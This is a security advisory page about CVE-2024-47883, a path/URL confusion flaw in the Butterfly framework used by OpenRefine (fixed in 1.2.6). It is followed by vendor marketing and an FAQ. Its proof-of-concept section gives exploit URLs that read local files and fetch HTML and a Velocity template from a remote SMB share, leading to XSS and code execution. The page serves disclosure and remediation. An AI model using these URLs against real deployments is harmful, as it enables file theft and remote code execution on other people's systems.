Summary
Butterfly has path/URL confusion in resource handling leading to multiple weaknesses
The Butterfly framework uses the java.net.URL class to refer to (what are expected to be) local resource files, like images or templates. This works: "opening a connection" to these URLs opens the local file. However, if a file:/ URL is directly given where a relative path (resource name) is expected, this is also accepted in some code paths; the app then fetches the file, from a remote machine if indicated, and uses it as if it was a trusted part of the app's codebase.
This leads to multiple weaknesses and potential weaknesses:
- An attacker that has network access to the application could use it to gain access to files, either on the the server's filesystem (path traversal) or shared by nearby machines (server-side request forgery with e.g. SMB).
- An attacker that can lead or redirect a user to a crafted URL belonging to the app could cause arbitrary attacker-controlled JavaScript to be loaded in the victim's browser (cross-site scripting).
- If an app is written in such a way that an attacker can influence the resource name used for a template, that attacker could cause the app to fetch and execute an attacker-controlled template (remote code execution).
Details
The edu.mit.simile.butterfly.ButterflyModuleImpl.getResource method converts a resource name into an URL, for instance:
images/logo-gem-126.svg
file:/C:/Users/Wander/IdeaProjects/OpenRefine/main/webapp/modules/core/images/logo-gem-126.svg
If the resource name already starts with file:/, it is passed through unmodified (line 287). There is no check that the resulting URL is inside the expected directory or on the same machine.
The default implementation for process in ButterflyModuleImpl is to serve a named resource, which makes it vulnerable. The Velocity template library is bound to the same getResource implementation through the ButterflyResourceLoader class, which means it is also vulnerable if template resource names can somehow be influenced by an attacker.
PoC
This demonstration has been tested with OpenRefine on a Windows machine. Start OpenRefine, create a file (here example.js) with some contents, then concatenate the OpenRefine URL and its file:/ URL, as follows:
http://localhost:3333/file:/C:/Users/Wander/example.js
The file is read and sent to the browser. Then, visit:
http://localhost:3333/file:%2f%2fwandernauta.nl/public/demo.html
Assuming there are no firewalls in the way, the HTML page is retrieved from the public SMB (Samba) network share and sent to the browser, which executes the embedded JavaScript.
In the case of OpenRefine specifically, to demonstrate the attacker-controlled template name case:
http://localhost:3333/file:%2f%2fwandernauta.nl/public/index
An index.vt template containing the snippet above is retrieved from the same share, which is then executed; the Windows calculator opens.
Impact
Depending on how the framework is used: path traversal, XSS, SSRF; potentially RCE.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2024-47883 has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.2.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-47883? CVE-2024-47883 is a critical-severity path traversal vulnerability in org.openrefine.dependencies:butterfly (maven), affecting versions < 1.2.6. It is fixed in 1.2.6. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2024-47883? CVE-2024-47883 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of org.openrefine.dependencies:butterfly are affected by CVE-2024-47883? org.openrefine.dependencies:butterfly (maven) versions < 1.2.6 is affected.
- Is there a fix for CVE-2024-47883? Yes. CVE-2024-47883 is fixed in 1.2.6. Upgrade to this version or later.
- Is CVE-2024-47883 exploitable, and should I be worried? Whether CVE-2024-47883 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-47883 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-47883? Upgrade
org.openrefine.dependencies:butterflyto 1.2.6 or later.